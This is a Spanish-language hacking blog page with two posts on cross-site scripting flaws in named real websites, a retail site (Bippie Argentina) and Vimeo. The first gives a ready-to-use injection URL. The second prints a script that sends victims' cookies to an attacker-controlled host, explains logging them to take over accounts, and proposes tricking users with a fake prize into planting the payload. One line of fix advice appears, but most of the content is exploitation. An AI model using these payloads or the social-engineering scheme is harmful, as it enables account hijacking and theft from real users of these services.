Mostrando entradas con la etiqueta cookies. Mostrar todas las entradas
Mostrando entradas con la etiqueta cookies. Mostrar todas las entradas

Bippie Argentina: XSS Pwned

http://www.rainbowgrabaciones.com.ar/logos-bippie.png

Ante todo gracias a Skeletron, de ElHacker.net, por avisarme de este garrafal fallo




Vamos a revisar uno de los fallos que presenta esta conocida web ;D (si fallan a este nivel, no hay duda de que también tendrán SQLi, dejo la tarea a investigar al que le interese :P )

http://ar.bippie.com/modules/catalog/prodinfo.php?categoria=%3C/title%3E%3Cscript%3Ealert%20%28%22Jugando%20con%20Fosforos%22%29;%3C/script%3E&sub_categoria=rock+nacional&nombre=solotelscompatibles&sbrand=5&smodel=8%2F826#4130952372793495685





Simplisimo!, solo tenemos que escaparnos de la etiqueta <>, y a inyectar html se ha dicho :laugh:

Por esto, es por lo que debeis de recordar siempre, que al mostrar texto que es proporcionado por el cliente, hay que colocar un htmlspecialchars(). :rolleyes:

Un saludo, y hasta la próxima!

PD: He tenido que colocar la url codificada poraque me causaba a mi mismo un XSS :¬¬


XSS + Robo de Cookies en Vimeo

http://www.davedixon.org/file.php/1/vimeo.jpg
Mientras comprobaba esa leyenda urbana de que Vimeo es mejor que Youtube, encontré un XSS, que aunque tiene una cierta dificultad de explotar, puede ser interesante de investigar.

El fallo en cuestión se encuentra en la opción de añadir créditos, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema. :laugh:

La parte interesante es que esto es una llamada AJAX, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.

http://i39.tinypic.com/eqwi9u.jpg
Haz click para ver la imagen a tamaño completo


Aquí podemos ver un XSS inofensivo, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:

<>document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;< /script >


El código del PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada. ;-)
Aun así, al no haber un método directo (o no descubierto) de hacer esto, como puede ser en los XSS por link, habría que hacer un poco de uso de ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el "código del vídeo", que no seria mas que nuestro XSS. ;D